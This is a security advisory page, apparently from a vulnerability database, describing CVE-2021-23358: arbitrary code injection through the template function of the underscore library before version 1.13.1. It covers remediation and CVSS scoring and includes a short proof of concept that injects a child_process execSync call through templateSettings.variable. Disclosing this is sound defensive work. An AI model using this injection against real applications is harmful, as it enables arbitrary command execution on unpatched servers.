Arbitrary Code Injection

Affecting org.webjars.npm:underscore artifact, versions [0,1.13.1)

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

org.webjars.npm:underscore is a JavaScript's functional programming helper library.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the template function, particularly when the variable option is taken from _.templateSettings as it is not sanitized.

PoC

const _ = require('underscore');
_.templateSettings.variable = "a = this.process.mainModule.require('child_process').execSync('touch HELLO')";
const t = _.template("")();

Remediation

Upgrade org.webjars.npm:underscore to version 1.13.1 or higher.

References

CVSS Score

3.3
low severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
Credit
Alessio Della Libera (@d3lla)
CVE
CVE-2021-23358
CWE
CWE-94
Snyk ID
SNYK-JAVA-ORGWEBJARSNPM-1081503
Disclosed
02 Mar, 2021
Published
29 Mar, 2021